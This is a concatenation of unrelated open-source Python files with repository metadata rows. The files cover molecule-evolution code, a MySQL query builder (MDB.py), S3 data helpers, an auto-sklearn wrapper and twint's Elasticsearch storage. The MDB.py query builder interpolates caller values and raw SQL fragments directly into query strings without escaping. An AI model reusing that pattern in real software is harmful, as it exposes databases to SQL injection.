Returns:
to_replace (list): indices of molecules that will be replaced by random mutations of
molecules in list 'to_keep'
to_keep (list): indices of molecules that will be kept for the following generations
'''
# Get the probabilities that a molecule with a given fitness will be replaced
# a fermi function is used to smoothen the transition
positions = np.array(range(0, len(order))) - 0.2*float(len(order))
probabilities = 1.0 / (1.0 + np.exp(-0.02 * generation_size * positions / float(len(order))))
# import matplotlib.pyplot as plt
# plt.plot(positions, probabilities)
# plt.show()
to_replace = [] # all molecules that are replaced
to_keep = [] # all molecules that are kept
for idx in range(0,len(order)):
if np.random.rand(1) < probabilities[idx]:
to_replace.append(idx)
else:
to_keep.append(idx)
return to_replace, to_keep
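# Minimal sketch of the replacement probabilities computed above (hypothetical
# helper, assuming the common case where generation_size equals the number of
# ordered molecules N): the Fermi function then reduces to
# 1 / (1 + exp(-0.02 * (idx - 0.2 * N))), so the molecule ranked at 0.2*N has a
# 50% chance of being replaced, fitter (lower-index) molecules are mostly kept,
# and less fit ones are mostly replaced.
def _replacement_probability_example(idx, n_molecules):
    '''Probability that the molecule at rank idx is replaced, for the N == generation_size case.'''
    position = idx - 0.2 * float(n_molecules)
    return 1.0 / (1.0 + np.exp(-0.02 * position))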
def obtain_next_gen_molecules(order, to_replace, to_keep,
selfies_ordered, smiles_ordered, max_molecules_len):
''' Obtain the next generation of molecules. Bad molecules are replaced by
mutations of good molecules
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
to_replace (list) : list of indices of molecules to be replaced by random mutations of better molecules
to_keep (list) : list of indices of molecules to be kept in following generation
selfies_ordered (list) : list of SELFIES molecules, ordered by fitness
smiles_ordered (list) : list of SMILES molecules, ordered by fitness
max_molecules_len (int) : length of largest molecule
Returns:
smiles_mutated (list): next generation of mutated molecules as SMILES
selfies_mutated(list): next generation of mutated molecules as SELFIES
'''
smiles_mutated = []
selfies_mutated = []
for idx in range(0,len(order)):
if idx in to_replace: # smiles to replace (by better molecules)
random_index=np.random.choice(to_keep, size=1, replace=True, p=None)[0] # select a random molecule that survived
grin_new, smiles_new = evo.mutations_random_grin(selfies_ordered[random_index], max_molecules_len) # do the mutation
# add mutated molecule to the population
smiles_mutated.append(smiles_new)
selfies_mutated.append(grin_new)
else: # smiles to keep
smiles_mutated.append(smiles_ordered[idx])
selfies_mutated.append(selfies_ordered[idx])
return smiles_mutated, selfies_mutated
def obtain_discrm_data(disc_enc_type, molecules_reference, smiles_mutated, selfies_mutated, max_molecules_len, num_processors, generation_index):
'''Obtain data that will be used to train the discriminator (inputs & labels)
'''
if disc_enc_type == 'smiles':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(smiles_mutated))])
elif disc_enc_type == 'selfies':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(selfies_mutated)).tolist()
dataset_smiles = selfies_mutated + random_dataset_selection
dataset_x = evo._to_onehot(dataset_smiles, disc_enc_type, max_molecules_len)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in selfies_mutated] +
[1 for i in range(len(dataset_smiles)-len(selfies_mutated))])
elif disc_enc_type == 'properties_rdkit':
random_dataset_selection = np.random.choice(list(molecules_reference.keys()), size=len(smiles_mutated)).tolist()
dataset_smiles = smiles_mutated + random_dataset_selection # Generation smiles + Dataset smiles
dataset_x = evo.obtain_discr_encoding(dataset_smiles, disc_enc_type, max_molecules_len, num_processors, generation_index)
dataset_y = np.array([1 if x in molecules_reference else 0 for x in smiles_mutated] +
[1 for i in range(len(dataset_smiles)-len(smiles_mutated))])
# Shuffle training data
order_training = np.arange(len(dataset_smiles))
np.random.shuffle(order_training)
dataset_x = dataset_x[order_training]
dataset_y = dataset_y[order_training]
return dataset_x, dataset_y
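# Sketch of the label layout produced above (illustrative): for a generation of
# size N, dataset_y holds N labels for the mutated molecules (1 only if a mutant
# already appears in the reference set, otherwise 0) followed by N ones for the
# reference molecules sampled from the dataset; both are then shuffled together
# with dataset_x using the same permutation.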
def update_gen_res(smiles_all, smiles_mutated, selfies_all, selfies_mutated, smiles_all_counter):
'''Collect results that will be shared with global variables outside generations
'''
smiles_all.append(smiles_mutated)
selfies_all.append(selfies_mutated)
for smi in smiles_mutated:
if smi in smiles_all_counter:
smiles_all_counter[smi] += 1
else:
smiles_all_counter[smi] = 1
return smiles_all, selfies_all, smiles_all_counter
| 47.75 | 252 | 0.643372 |
5b8c822bb202a604a59268cdb291c793c7854bd1 | 8,776 | py | Python | MDB.py | neoinmatrix/MDB | ca88bc3caf9f59583197598290c2f48bd370a76c | [
"Apache-2.0"
] | null | null | null | MDB.py | neoinmatrix/MDB | ca88bc3caf9f59583197598290c2f48bd370a76c | [
"Apache-2.0"
] | null | null | null | MDB.py | neoinmatrix/MDB | ca88bc3caf9f59583197598290c2f48bd370a76c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Date : 18-11-28
# Author : neo
import yaml
import os
import torndb
class DB:
options = {
"field": "",
"table": "",
"join": "",
"where": "",
"having": "",
"group": "",
"order": "",
"limit": "",
}
temp = {
"add": "",
"update": "",
}
def __init__(self, conf="./default.yaml"):
try:
if type(conf) == str:
if os.path.exists(conf) == False:
err = "Error conf file not exists"
raise Exception(err)
with open(conf) as cf:
dbconf = yaml.load(cf)["db"]
if conf == False:
raise ("no setting")
else:
self.dbconf = dbconf
except:
print "can not load database setting"
self.getConn()
def getConn(self):
db = torndb.Connection(**self.dbconf)
self.dbconn = db
return self
def table(self, table):
for k in self.options:
self.options[k] = ''
for k in self.temp:
self.temp[k] = ''
tb = table.split(' ')
if len(tb) > 1:
table = "`%s` %s" % (tb[0], tb[1])
else:
table = "`%s`" % table
self.options['table'] = table
return self
def query(self, sql):
result = self.dbconn.query(sql)
return result
def execute(self, sql):
result = self.dbconn.execute(sql)
return result
def fetch(self, type='select'):
if self.options["table"] == "":
raise Exception("no table selected")
if type == "select":
sql = "select (field) from (table) (join) (where) (group) (having) (order) (limit) ;"
for k, v in self.options.items():
if k == "field" and v == '':
v = " * "
sql = sql.replace(" (%s) " % k, v)
sql = " ".join(sql.split())
elif type == "insert":
add = self.temp["add"]
sql = "insert into (table) ( (key) ) value ( (value) );"
keys = ",".join(["`%s`" % str(k) for k in add.keys()])
values = ",".join(["'%s'" % str(v) for v in add.values()])
sql = sql.replace(" (table) ", self.options["table"])
sql = sql.replace(" (key) ", keys)
sql = sql.replace(" (value) ", values)
elif type == "update":
sql = "update (table) (join) set (update) (where) ;"
for k, v in self.options.items():
if k == "where" and v == "":
raise Exception("no where identity, use ' ' for where ")
sql = sql.replace(" (%s) " % k, v)
updates = []
for k, v in self.temp["update"].items():
t = k.split('.')
if len(t) > 1:
updates.append(" %s.`%s`='%s'" % (t[0], t[1], v))
else:
updates.append(" `%s`='%s'" % (k, v))
update = ",".join(updates)
sql = sql.replace(" (update) ", update)
elif type == "delete":
sql = "delete from (table) (join) (where) (group) (having) ;"
for k, v in self.options.items():
if k == "where" and v == "":
raise Exception("no where identity, use ' ' for where ")
sql = sql.replace(" (%s) " % k, v)
else:
sql = ""
sql = " ".join(sql.split())
return sql
def find(self):
self.options["limit"] = "limit 0,1"
sql = self.fetch("select")
result = self.dbconn.get(sql)
self.sql = sql
return result
def select(self):
sql = self.fetch("select")
result = self.dbconn.query(sql)
self.sql = sql
return result
def insert(self, add=''):
if add == '' or type(add) != dict:
return ''
self.temp["add"] = add
sql = self.fetch("insert")
result = self.dbconn.execute(sql)
self.sql = sql
return result
def add(self, add=''):
return self.insert(add)
def delete(self):
sql = self.fetch("delete")
result = self.dbconn.execute_rowcount(sql)
self.sql = sql
return result
def update(self, update):
if update == '' or type(update) != dict:
return ''
self.temp["update"] = update
sql = self.fetch("update")
result = self.dbconn.execute(sql)
self.sql = sql
return result
def save(self, update):
return self.update(update)
def where(self, where):
if type(where) == dict and len(where) > 0:
where_arr = []
logic = ["exp", "eq", "neq", "lt", "gt", "elt", "egt",
"between", "not between", "in", "not in", "like"]
for k, v in where.items():
if len(k.split('.')) > 1:
key = " %s.`%s` " % (k.split('.')[0], k.split('.')[1])
elif k == "_string":
where_arr.append(v)
continue
else:
key = " `%s` " % (k)
if type(v) is not list:
where_arr.append("%s = '%s'" % (key, str(v)))
continue
vl = v[0].lower()
if vl not in logic:
continue
if vl == 'exp':
where_arr.append(" %s %s " % (key, str(v[1])))
continue
elif vl == 'eq':
where_arr.append(" %s = '%s' " % (key, str(v[1])))
continue
elif vl == 'neq':
where_arr.append(" %s <> '%s' " % (key, str(v[1])))
continue
elif vl == 'lt':
where_arr.append(" %s < '%s' " % (key, str(v[1])))
continue
elif vl == 'elt':
where_arr.append(" %s <= '%s' " % (key, str(v[1])))
continue
elif vl == 'gt':
where_arr.append(" %s > '%s' " % (key, str(v[1])))
continue
elif vl == 'egt':
where_arr.append(" %s >= '%s' " % (key, str(v[1])))
continue
elif vl == 'between':
where_arr.append(" %s between '%s' and '%s' " % (key, str(v[1][0]), str(v[1][1])))
continue
elif vl == 'not between':
where_arr.append(" %s not between '%s' and '%s' " % (key, str(v[1][0]), str(v[1][1])))
continue
elif vl == 'in':
vv = ["'%s'" % str(x) for x in v[1]]
where_arr.append(" %s in (%s) " % (key, ",".join(vv)))
continue
elif vl == 'not in':
vv = ["'%s'" % str(x) for x in v[1]]
where_arr.append(" %s not in (%s) " % (key, ",".join(vv)))
continue
elif vl == 'like':
where_arr.append(" %s like '%%%s%%' " % (key, v[1]))
continue
else:
continue
where = " where " + ' and '.join(where_arr)
where = ' '.join(where.split())
if type(where) == list and len(where) > 0:
where = "where " + " and ".join(where)
where = ' '.join(where.split())
self.options['where'] = where
return self
def join(self, join):
if type(join) == list:
join = ' '.join(join)
self.options["join"] = join
return self
def field(self, field):
self.options["field"] = field
return self
def group(self, group):
self.options["group"] = "group by %s" % group
return self
def having(self, having):
self.options["having"] = "having %s" % having
return self
def limit(self, limit):
if type(limit) == list:
self.options["limit"] = " limit %s,%s" % (limit[0], limit[1])
else:
self.options["limit"] = " limit %s" % limit
return self
def order(self, order):
self.options["order"] = " order by %s" % order
return self
def getField(self, field):
farr = field.split("as")
if len(farr) > 1:
get_field = farr[1].strip()
else:
get_field = field
self.options["field"] = field
result = self.find()
if result == None:
return ''
return result[get_field]
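# Illustrative usage sketch (assumes a reachable MySQL server and a `users`
# table; connection settings are read from default.yaml). The builder is meant
# to be chained and finished with select()/find()/add()/save()/delete():
#
#   db = DB("./default.yaml")
#   rows = db.table("users").where({"age": ["egt", 18]}).field("id,name").limit(10).select()
#   new_id = db.table("users").add({"name": "neo", "age": 20})
#   db.table("users").where({"id": new_id}).save({"age": 21})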
| 33.242424 | 112 | 0.419325 |
76256c23fc913068f06c99ae5870cdb964ee54ba | 3,811 | py | Python | util.py | aws-samples/sagemaker-deepar-workshop-es | 3c602570781f64ee0878f942a269f30c1b46710d | [
"MIT-0"
] | 1 | 2022-03-22T21:19:18.000Z | 2022-03-22T21:19:18.000Z | util.py | aws-samples/sagemaker-deepar-workshop-es | 3c602570781f64ee0878f942a269f30c1b46710d | [
"MIT-0"
] | null | null | null | util.py | aws-samples/sagemaker-deepar-workshop-es | 3c602570781f64ee0878f942a269f30c1b46710d | [
"MIT-0"
] | null | null | null | import pandas as pd
from botocore.exceptions import ClientError
from datetime import date, timedelta
def week_days(start_date, end_date):
"""
Creates a list of the Mondays through Fridays contained in the range of dates.
:param start_date: The starting date to evaluate; if it is a working day it is included in the list.
:param end_date: The end date, it is excluded even if is a working day.
:return: List of working days.
"""
days = list()
eval_date = start_date
while eval_date < end_date:
if eval_date.weekday() < 5:
days.append(eval_date)
eval_date = eval_date + timedelta(days=1)
return days
def list_keys(client, bucket, prefix, token=None):
"""
Recursive function used to retrieve all the object keys that match with a given prefix in the given S3 bucket.
:param client: Client for the Amazon S3 service.
:param bucket: The S3 bucket name.
:param prefix: The prefix used for filtering.
:param token: The continuation token returned by a previous call.
:return: The found keys matching the prefix.
"""
keys = list()
response = client.list_objects_v2(
Bucket=bucket,
Prefix=prefix,
ContinuationToken=token
) if token else client.list_objects_v2(
Bucket=bucket,
Prefix=prefix
)
if 'Contents' in response:
for item in response['Contents']:
keys.append(item['Key'])
if 'NextContinuationToken' in response:
keys += list_keys(client, bucket, prefix, response['NextContinuationToken'])
return keys
def copy_objects(client, src_bucket, dest_bucket, dest_prefix, dates):
"""
Copy the XETRA dataset objects from the source bucket to the destination bucket.
:param client: Client for the Amazon S3 service.
:param src_bucket: Source bucket containing the XETRA data set.
:param dest_bucket: Destination bucket to which the data set will be copied.
:param dest_prefix: The destination prefix used to create the destination object keys.
:param dates: The list of dates used to copy the objects.
:return: List of the object keys copied in this call.
"""
object_keys = list()
already_copied = list_keys(client, dest_bucket, dest_prefix)
for weekday in dates:
try:
# Catch error if a day does not exist in the source data set
for hour in range(0, 24):
src_key = f'{weekday.isoformat()}/{weekday.isoformat()}_BINS_XETR{hour:02d}.csv'
key = f'{dest_prefix}/{weekday.isoformat()}_BINS_XETR{hour:02d}.csv'
# Copy only new objects.
if key not in already_copied:
client.copy_object(
Bucket=dest_bucket,
Key=key,
CopySource={
'Bucket': src_bucket,
'Key': src_key
}
)
object_keys.append(key)
except ClientError as error:
print(error)
return object_keys
def create_dataframe(client, bucket, object_keys):
"""
Loads the list of objects from the S3 bucket into a pandas dataframe. Finally, concatenates all frames.
:param client: The Amazon S3 client.
:param bucket: Source bucket where the data will be read.
:param object_keys: The objects keys to read.
:return: The concatenated data frames.
"""
dfs = list()
for key in object_keys:
response = client.get_object(
Bucket=bucket,
Key=key
)
dfs.append(pd.read_csv(response['Body']))
return pd.concat(dfs, ignore_index=True)
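# Minimal end-to-end sketch of the helpers above (bucket names and the date
# range are assumptions for illustration, not part of the workshop code).
def example_copy_and_load(client, src_bucket='deutsche-boerse-xetra-pds',
                          dest_bucket='my-workshop-bucket', dest_prefix='xetra'):
    """Copy one trading week of XETRA files and load them into a single frame."""
    days = week_days(date(2022, 3, 7), date(2022, 3, 12))
    keys = copy_objects(client, src_bucket, dest_bucket, dest_prefix, days)
    return create_dataframe(client, dest_bucket, keys)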
| 38.494949 | 115 | 0.617423 |
f8802cfd5f72c320825a02a069ba5ae6a4b0c497 | 5,633 | py | Python | autosklearn_wrapper.py | inovex/automated-feature-engineering | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | [
"MIT"
] | null | null | null | autosklearn_wrapper.py | inovex/automated-feature-engineering | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | [
"MIT"
] | null | null | null | autosklearn_wrapper.py | inovex/automated-feature-engineering | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | [
"MIT"
] | null | null | null | import argparse
import os
import pickle
import shutil
import time
from math import sqrt
import autosklearn.classification
import autosklearn.regression
import numpy as np
from autosklearn.pipeline.components.base import \
AutoSklearnRegressionAlgorithm
from joblib import dump
from sklearn.metrics import mean_squared_error
from Data import DataHandler
from autosklearn_configuration import OwnDecisionTree, OwnRandomForest, OwnLinearReg, OwnLassoLarsCV
def rmse_scorer(y_true, y_pred):
# RMSE (mean_squared_error with squared=False) is only available from scikit-learn 0.22 onwards; auto-sklearn currently uses 0.21
return sqrt(mean_squared_error(y_true, y_pred))
class AutosklearnWrapper:
def __init__(self, model, dataFunction, trainSize=0.7, preprocessed=True, folderID=None, nDataPoints=100000):
if model in "DecisionTree":
self.model = OwnDecisionTree
elif model in "RandomForest":
self.model = OwnRandomForest
elif model in "LinearRegression":
self.model = OwnLinearReg
elif model in "LassoLarsCV":
self.model = OwnLassoLarsCV
else:
print(f'{model} not found!')
exit(1)
self.nDataPoints = nDataPoints
self.preprocessed = preprocessed
self.trainSize = trainSize
self.modelName = self.model.__name__
self.dataFunction = dataFunction
self.dataUsedName = self.dataFunction.__name__.split("_")[1]
# Export path
self.savePath = f'{os.path.dirname(os.path.abspath(__file__))}/runs/{self.dataUsedName}_{self.trainSize}/{self.modelName}'
# Add folder with number that represents evaluation run
self.savePath = DataHandler.createDictPath(self.savePath, folderID, False)
def regression(self, timeMax=60):
# Add regression component
autosklearn.pipeline.components.regression.add_regressor(self.model)
# Get data
X_train, X_test, y_train, y_test, feature_types = self.dataFunction(preprocessed=self.preprocessed, specifics="AUTOSKLEARN",
trainSize=self.trainSize, nDataPoints=self.nDataPoints)
rmse_metric = autosklearn.metrics.make_scorer(
name="rmse",
score_func=rmse_scorer,
optimum=0,
greater_is_better=False,
needs_proba=False,
needs_threshold=False,
)
# measure runtime
start_time = time.time()
# autosklearn automated feature engineering
automl = autosklearn.regression.AutoSklearnRegressor(
seed=np.random.randint(0, 100000),
ensemble_size=0,
time_left_for_this_task=timeMax*60,
per_run_time_limit=30*60,
tmp_folder=self.savePath,
delete_tmp_folder_after_terminate=False,
output_folder=f'{self.savePath}_output',
delete_output_folder_after_terminate=True,
include_estimators=[self.modelName, ],
# Does not take autosklearn and smac resources into account
ml_memory_limit=7000,
# cv for comparability
resampling_strategy='cv',
resampling_strategy_arguments={'folds': 4},
# Timeout hits earlier
smac_scenario_args={'runcount_limit': 5000}
)
# Fit changes data in place, need original for refit
automl.fit(X_train.copy(), y_train.copy(), dataset_name=self.dataUsedName, feat_type=feature_types, metric=rmse_metric)
print(f"Fit time {int(divmod(time.time() - start_time, 60)[0])}")
# final ensemble on the whole dataset.
automl.fit_ensemble(y_train.copy(), ensemble_size=1)
print(f"Fit ensemble time {int(divmod(time.time() - start_time, 60)[0])}")
automl.refit(X_train.copy(), y_train.copy())
print(f"Refit time {int(divmod(time.time() - start_time, 60)[0])}")
total_time = int(divmod(time.time() - start_time, 60)[0])
# export model
dump(automl, f"{self.savePath}/model_time{total_time}.joblib")
# make predictions
predictions = automl.predict(X_test)
predictionMetric = rmse_scorer(y_test, predictions)
# Export predictions and further stats
with open(f"{self.savePath}/performanceHistory_score{predictionMetric}.pkl", 'wb') as file:
pickle.dump(automl.cv_results_["mean_test_score"], file)
with open(f"{self.savePath}/sprintStatistics.pkl", 'wb') as file:
pickle.dump(automl.sprint_statistics(), file)
# Remove large model files
shutil.rmtree(f'{self.savePath}/.auto-sklearn', ignore_errors=True)
# command-line for ease of use
parser = argparse.ArgumentParser(description='Autosklearn input parser')
parser.add_argument('--time', type=int, help='Time for the optimisation in minutes', default=1)
parser.add_argument('--model', help='Name of class chosen for evaluation')
parser.add_argument('--data', help='Name of data')
parser.add_argument('--trainSize', help='Train size', default=0.7, type=float)
parser.add_argument('--problem', help='Regression or classification problem')
parser.add_argument('--folderID', help='ID for folder')
parser.add_argument('--nDataPoints', type=int, help='Reduce data to subsample size.', default=100000)
args = parser.parse_args()
if "reg" in args.problem:
AutosklearnWrapper(model=args.model, dataFunction=DataHandler.stringToMethod(args.data), trainSize=args.trainSize,
folderID=args.folderID, nDataPoints=args.nDataPoints).regression(args.time)
else:
print("Not supported")
| 41.725926 | 132 | 0.676016 |
79a51cce2db2d1cf8a2fcff977874a8dfe699b68 | 13,961 | py | Python | twint/storage/elasticsearch.py | nicprd/twint | 0f19841b0f2e6456094c6c85b89faf8a0e82f7b1 | [
"MIT"
] | 4 | 2020-03-10T15:05:55.000Z | 2021-03-15T21:29:46.000Z | twint/storage/elasticsearch.py | robikurniawan/twint | 81f6c2c516a231136fbd821bd6a53d7959965fee | [
"MIT"
] | null | null | null | twint/storage/elasticsearch.py | robikurniawan/twint | 81f6c2c516a231136fbd821bd6a53d7959965fee | [
"MIT"
] | 2 | 2020-05-06T13:47:57.000Z | 2021-03-24T18:43:03.000Z | ## TODO - Fix Weekday situation
from elasticsearch import Elasticsearch, helpers
from geopy.geocoders import Nominatim
from time import strftime, localtime
import contextlib
import sys
_index_tweet_status = False
_index_follow_status = False
_index_user_status = False
_is_near_def = False
_is_location_def = False
_near = {}
_location = {}
geolocator = Nominatim(user_agent="twint-1.2")
class RecycleObject(object):
def write(self, junk): pass
def flush(self): pass
def getLocation(place, **options):
location = geolocator.geocode(place,timeout=1000)
if location:
if options.get("near"):
global _near
_near = {"lat": location.latitude, "lon": location.longitude}
return True
elif options.get("location"):
global _location
_location = {"lat": location.latitude, "lon": location.longitude}
return True
return {"lat": location.latitude, "lon": location.longitude}
else:
return {}
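# Behaviour sketch (illustrative, actual coordinates depend on Nominatim): a
# plain call such as getLocation("Berlin") returns a {"lat": ..., "lon": ...}
# dict, while getLocation("Berlin", near=True) or location=True instead fills
# the module-level _near/_location globals and returns True; an unresolvable
# place yields an empty dict in every case.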
def handleIndexResponse(response):
try:
if response["status"] == 400:
return True
except KeyError:
pass
if response["acknowledged"]:
print("[+] Index \"" + response["index"] + "\" created!")
else:
print("[x] error index creation :: storage.elasticsearch.handleIndexCreation")
if response["shards_acknowledged"]:
print("[+] Shards acknowledged, everything is ready to be used!")
return True
else:
print("[x] error with shards :: storage.elasticsearch.HandleIndexCreation")
return False
def createIndex(config, instance, **scope):
if scope.get("scope") == "tweet":
tweets_body = {
"mappings": {
"properties": {
"id": {"type": "long"},
"conversation_id": {"type": "long"},
"created_at": {"type": "long"},
"date": {"type": "date", "format": "yyyy-MM-dd HH:mm:ss"},
"timezone": {"type": "keyword"},
"place": {"type": "keyword"},
"location": {"type": "keyword"},
"tweet": {"type": "text"},
"hashtags": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"cashtags": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"user_id_str": {"type": "keyword"},
"username": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"name": {"type": "text"},
"profile_image_url": {"type": "text"},
"day": {"type": "integer"},
"hour": {"type": "integer"},
"link": {"type": "text"},
"retweet": {"type": "text"},
"essid": {"type": "keyword"},
"nlikes": {"type": "integer"},
"nreplies": {"type": "integer"},
"nretweets": {"type": "integer"},
"quote_url": {"type": "text"},
"video": {"type":"integer"},
"search": {"type": "text"},
"near": {"type": "text"},
"geo_near": {"type": "geo_point"},
"geo_tweet": {"type": "geo_point"},
"photos": {"type": "text"},
"user_rt_id": {"type": "keyword"},
"mentions": {"type": "keyword", "normalizer": "hashtag_normalizer"},
"source": {"type": "keyword"},
"user_rt": {"type": "keyword"},
"retweet_id": {"type": "keyword"},
"reply_to": {
"type": "nested",
"properties": {
"user_id": {"type": "keyword"},
"username": {"type": "keyword"}
}
},
"retweet_date": {"type": "date", "format": "yyyy-MM-dd HH:mm:ss"},
"urls": {"type": "keyword"},
"translate": {"type": "text"},
"trans_src": {"type": "keyword"},
"trans_dest": {"type": "keyword"},
}
},
"settings": {
"number_of_shards": 1,
"analysis": {
"normalizer": {
"hashtag_normalizer": {
"type": "custom",
"char_filter": [],
"filter": ["lowercase", "asciifolding"]
}
}
}
}
}
with nostdout():
resp = instance.indices.create(index=config.Index_tweets, body=tweets_body, ignore=400)
return handleIndexResponse(resp)
elif scope.get("scope") == "follow":
follow_body = {
"mappings": {
"properties": {
"user": {"type": "keyword"},
"follow": {"type": "keyword"},
"essid": {"type": "keyword"}
}
},
"settings": {
"number_of_shards": 1
}
}
with nostdout():
resp = instance.indices.create(index=config.Index_follow, body=follow_body, ignore=400)
return handleIndexResponse(resp)
elif scope.get("scope") == "user":
user_body = {
"mappings": {
"properties": {
"id": {"type": "keyword"},
"name": {"type": "keyword"},
"username": {"type": "keyword"},
"bio": {"type": "text"},
"location": {"type": "keyword"},
"url": {"type": "text"},
"join_datetime": {"type": "date", "format": "yyyy-MM-dd HH:mm:ss"},
"tweets": {"type": "integer"},
"following": {"type": "integer"},
"followers": {"type": "integer"},
"likes": {"type": "integer"},
"media": {"type": "integer"},
"private": {"type": "integer"},
"verified": {"type": "integer"},
"avatar": {"type": "text"},
"background_image": {"type": "text"},
"session": {"type": "keyword"},
"geo_user": {"type": "geo_point"}
}
},
"settings": {
"number_of_shards": 1
}
}
with nostdout():
resp = instance.indices.create(index=config.Index_users, body=user_body, ignore=400)
return handleIndexResponse(resp)
else:
print("[x] error index pre-creation :: storage.elasticsearch.createIndex")
return False
@contextlib.contextmanager
def nostdout():
savestdout = sys.stdout
sys.stdout = RecycleObject()
yield
sys.stdout = savestdout
def weekday(day):
weekdays = {
"Monday": 1,
"Tuesday": 2,
"Wednesday": 3,
"Thursday": 4,
"Friday": 5,
"Saturday": 6,
"Sunday": 7,
}
return weekdays[day]
def hour(datetime):
return strftime("%H", localtime(datetime))
def Tweet(Tweet, config):
global _index_tweet_status
global _is_near_def
weekdays = {
"Monday": 1,
"Tuesday": 2,
"Wednesday": 3,
"Thursday": 4,
"Friday": 5,
"Saturday": 6,
"Sunday": 7,
}
day = weekdays[strftime("%A", localtime(Tweet.datetime/1000))]
actions = []
dt = f"{Tweet.datestamp} {Tweet.timestamp}"
j_data = {
"_index": config.Index_tweets,
"_id": str(Tweet.id) + "_raw_" + config.Essid,
"_source": {
"id": str(Tweet.id),
"conversation_id": Tweet.conversation_id,
"created_at": Tweet.datetime,
"date": dt,
"timezone": Tweet.timezone,
"place": Tweet.place,
"tweet": Tweet.tweet,
"hashtags": Tweet.hashtags,
"cashtags": Tweet.cashtags,
"user_id_str": Tweet.user_id_str,
"username": Tweet.username,
"name": Tweet.name,
"day": day,
"hour": hour(Tweet.datetime/1000),
"link": Tweet.link,
"retweet": Tweet.retweet,
"essid": config.Essid,
"nlikes": int(Tweet.likes_count),
"nreplies": int(Tweet.replies_count),
"nretweets": int(Tweet.retweets_count),
"quote_url": Tweet.quote_url,
"video": Tweet.video,
"search": str(config.Search),
"near": config.Near
}
}
if Tweet.retweet:
j_data["_source"].update({"user_rt_id": Tweet.user_rt_id})
j_data["_source"].update({"user_rt": Tweet.user_rt})
j_data["_source"].update({"retweet_id": Tweet.retweet_id})
j_data["_source"].update({"retweet_date": Tweet.retweet_date})
if Tweet.reply_to:
j_data["_source"].update({"reply_to": Tweet.reply_to})
if Tweet.photos:
_photos = []
for photo in Tweet.photos:
_photos.append(photo)
j_data["_source"].update({"photos": _photos})
if Tweet.mentions:
_mentions = []
for mention in Tweet.mentions:
_mentions.append(mention)
j_data["_source"].update({"mentions": _mentions})
if Tweet.urls:
_urls = []
for url in Tweet.urls:
_urls.append(url)
j_data["_source"].update({"urls": _urls})
if config.Near or config.Geo:
if not _is_near_def:
__geo = ""
__near = ""
if config.Geo:
__geo = config.Geo
if config.Near:
__near = config.Near
_is_near_def = getLocation(__near + __geo, near=True)
if _near:
j_data["_source"].update({"geo_near": _near})
if Tweet.place:
_t_place = getLocation(Tweet.place)
if _t_place:
j_data["_source"].update({"geo_tweet": getLocation(Tweet.place)})
if Tweet.source:
j_data["_source"].update({"source": Tweet.Source})
if config.Translate:
j_data["_source"].update({"translate": Tweet.translate})
j_data["_source"].update({"trans_src": Tweet.trans_src})
j_data["_source"].update({"trans_dest": Tweet.trans_dest})
actions.append(j_data)
es = Elasticsearch(config.Elasticsearch, verify_certs=config.Skip_certs)
if not _index_tweet_status:
_index_tweet_status = createIndex(config, es, scope="tweet")
with nostdout():
helpers.bulk(es, actions, chunk_size=2000, request_timeout=200)
actions = []
def Follow(user, config):
global _index_follow_status
actions = []
if config.Following:
_user = config.Username
_follow = user
else:
_user = user
_follow = config.Username
j_data = {
"_index": config.Index_follow,
"_id": _user + "_" + _follow + "_" + config.Essid,
"_source": {
"user": _user,
"follow": _follow,
"essid": config.Essid
}
}
actions.append(j_data)
es = Elasticsearch(config.Elasticsearch, verify_certs=config.Skip_certs)
if not _index_follow_status:
_index_follow_status = createIndex(config, es, scope="follow")
with nostdout():
helpers.bulk(es, actions, chunk_size=2000, request_timeout=200)
actions = []
def UserProfile(user, config):
global _index_user_status
global _is_location_def
actions = []
j_data = {
"_index": config.Index_users,
"_id": user.id + "_" + user.join_date + "_" + user.join_time + "_" + config.Essid,
"_source": {
"id": user.id,
"name": user.name,
"username": user.username,
"bio": user.bio,
"location": user.location,
"url": user.url,
"join_datetime": user.join_date + " " + user.join_time,
"tweets": user.tweets,
"following": user.following,
"followers": user.followers,
"likes": user.likes,
"media": user.media_count,
"private": user.is_private,
"verified": user.is_verified,
"avatar": user.avatar,
"background_image": user.background_image,
"session": config.Essid
}
}
if config.Location:
if not _is_location_def:
_is_location_def = getLocation(user.location, location=True)
if _location:
j_data["_source"].update({"geo_user": _location})
actions.append(j_data)
es = Elasticsearch(config.Elasticsearch, verify_certs=config.Skip_certs)
if not _index_user_status:
_index_user_status = createIndex(config, es, scope="user")
with nostdout():
helpers.bulk(es, actions, chunk_size=2000, request_timeout=200)
actions = []
| 38.040872 | 99 | 0.471528 |
619f90dfb5405eeae06f2b81e9a9382de2cefb76 | 1,177 | py | Python | var/spack/repos/builtin/packages/libtlx/package.py | carlabguillen/spack | 7070bb892f9bdb5cf9e76e0eecd64f6cc5f4695c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2020-05-24T15:23:12.000Z | 2020-05-24T15:23:12.000Z | var/spack/repos/builtin/packages/libtlx/package.py | carlabguillen/spack | 7070bb892f9bdb5cf9e76e0eecd64f6cc5f4695c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 6 | 2022-02-26T11:44:34.000Z | 2022-03-12T12:14:50.000Z | var/spack/repos/builtin/packages/libtlx/package.py | carlabguillen/spack | 7070bb892f9bdb5cf9e76e0eecd64f6cc5f4695c | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2019-10-29T09:08:17.000Z | 2019-10-29T09:08:17.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
